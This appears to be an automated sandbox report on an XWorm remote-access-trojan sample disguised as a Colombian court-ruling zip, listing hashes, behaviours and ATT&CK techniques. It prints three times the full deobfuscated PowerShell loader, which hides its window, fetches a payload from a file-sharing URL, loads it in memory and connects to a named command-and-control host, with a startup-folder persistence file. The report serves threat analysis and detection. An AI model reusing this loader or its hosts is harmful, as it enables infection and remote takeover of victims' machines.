xworm | 0cf292ac0cdac7a8a901ca29ad6db6782fc49ad1b29508c22c1c77c9c823434b

General

Target

FALLO ACCIÓN DE TUTELA 2023-250 JDO 02 CMES.zip
Size

6KB
MD5

298e4d9405ddb8493d6b7beff47b1f40
SHA1

337ffe4c1032276b6ac4997cdb8e549ad3bed5c3
SHA256

0cf292ac0cdac7a8a901ca29ad6db6782fc49ad1b29508c22c1c77c9c823434b
SHA512

d91f2c3dcd115dd6e25aff3d25243571b45a1d80eaf80169c86fba8a54b3c80b00741100711c103d21ab119cce9f115384759183c0a4eb289706d6a5f1a28644
SSDEEP

192:cerAWJ85Qm+CgkpP01O598cF72VzEb6BY:cgxwR+OqU38cwVo6u

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://3105.filemail.com/api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904f

exe.dropper

https://3105.filemail.com/api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904f

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/3280-20-0x0000020D7AE10000-0x0000020D7B1A4000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 3 IoCs

flow	pid	Process
43	3280	powershell.exe
45	3768	powershell.exe
46	3288	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3280	powershell.exe
3768	powershell.exe
3288	powershell.exe

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\monographista.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\monographista.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\monographista.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\monographista.bat	cmd.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	7zFM.exe
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	7zFM.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3280	powershell.exe
3280	powershell.exe
3768	powershell.exe
3768	powershell.exe
3288	powershell.exe
3288	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3108	7zFM.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeRestorePrivilege	3108	7zFM.exe
Token: 35	3108	7zFM.exe
Token: SeSecurityPrivilege	3108	7zFM.exe
Token: SeSecurityPrivilege	3108	7zFM.exe
Token: SeDebugPrivilege	3280	powershell.exe
Token: SeDebugPrivilege	3768	powershell.exe
Token: SeDebugPrivilege	3288	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
3108	7zFM.exe
3108	7zFM.exe
3108	7zFM.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1628 wrote to memory of 3280	1628	cmd.exe	112
PID 1628 wrote to memory of 3280	1628	cmd.exe	112
PID 4676 wrote to memory of 3768	4676	cmd.exe	116
PID 4676 wrote to memory of 3768	4676	cmd.exe	116
PID 1712 wrote to memory of 3288	1712	cmd.exe	120
PID 1712 wrote to memory of 3288	1712	cmd.exe	120

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\FALLO ACCIÓN DE TUTELA 2023-250 JDO 02 CMES.zip"
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3108

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\FALLO ACCIÓN DE TUTELA 2023-250 JDO 02 CMES.bat" "
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1628
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1tTDJfVG5JR0tRcW9jQjZ6THZjdk42OFRxX0ZwZkM0R2g4VkNnc3pfaURocVUzVVhfSF9veHYzY1V5c09VTHBNJnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDg1MTQ3MGEwOTA0Zg=='; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('gabrielfuentes.chickenkiller.com', '1996');"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\FALLO ACCIÓN DE TUTELA 2023-250 JDO 02 CMES.bat" "
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:4676
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1tTDJfVG5JR0tRcW9jQjZ6THZjdk42OFRxX0ZwZkM0R2g4VkNnc3pfaURocVUzVVhfSF9veHYzY1V5c09VTHBNJnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDg1MTQ3MGEwOTA0Zg=='; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('gabrielfuentes.chickenkiller.com', '1996');"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\FALLO ACCIÓN DE TUTELA 2023-250 JDO 02 CMES.bat" "
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1712
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1tTDJfVG5JR0tRcW9jQjZ6THZjdk42OFRxX0ZwZkM0R2g4VkNnc3pfaURocVUzVVhfSF9veHYzY1V5c09VTHBNJnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDg1MTQ3MGEwOTA0Zg=='; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('gabrielfuentes.chickenkiller.com', '1996');"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3288

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f2c32a4934213c2159a9e4d21905e67d

SHA1
5bde42108c9dbec1c4bfe8f7c40743f4062c5963

SHA256
676243f0f8b28d8a06df8355f08bf5c05328d9d2dcf582779e1c918a59477d73

SHA512
9fc82e3dbcc2544829375a90e9a9940077393ffeb548f8ba7eacc4a3b3531440442ad3cda695d87de5a49cdc6518966506356b3ce1ef5edaf46fe0f774de8567

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dmmir52y.get.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\FALLO ACCIÓN DE TUTELA 2023-250 JDO 02 CMES.bat

Filesize
210KB

MD5
24e3c5a8c5ce37efb76a08a124a2f525

SHA1
1378fa68873d9ce2368aac281632ff5dab2f59d0

SHA256
233bca3f0a5f3dbc98d3765ecc8631fd552366a78f052cc13c970b94a107e459

SHA512
e9ae4a7948cefe01143e5646220f9b6d1c78b34db0ec4f2220d74daf8add209d5b55f76eb2fcf2b3d995cdeee957aebb3e0f9f736cced0ddba8ba249d18bcc62

Download Submit
memory/3280-20-0x0000020D7AE10000-0x0000020D7B1A4000-memory.dmp

Filesize
3.6MB

Download
memory/3280-19-0x00007FFCA0C10000-0x00007FFCA16D1000-memory.dmp

Filesize
10.8MB

Download
memory/3280-18-0x00007FFCA0C10000-0x00007FFCA16D1000-memory.dmp

Filesize
10.8MB

Download
memory/3280-45-0x00007FFCA0C13000-0x00007FFCA0C15000-memory.dmp

Filesize
8KB

Download
memory/3280-46-0x00007FFCA0C10000-0x00007FFCA16D1000-memory.dmp

Filesize
10.8MB

Download
memory/3280-47-0x00007FFCA0C10000-0x00007FFCA16D1000-memory.dmp

Filesize
10.8MB

Download
memory/3280-13-0x0000020D7A870000-0x0000020D7A892000-memory.dmp

Filesize
136KB

Download
memory/3280-7-0x00007FFCA0C13000-0x00007FFCA0C15000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing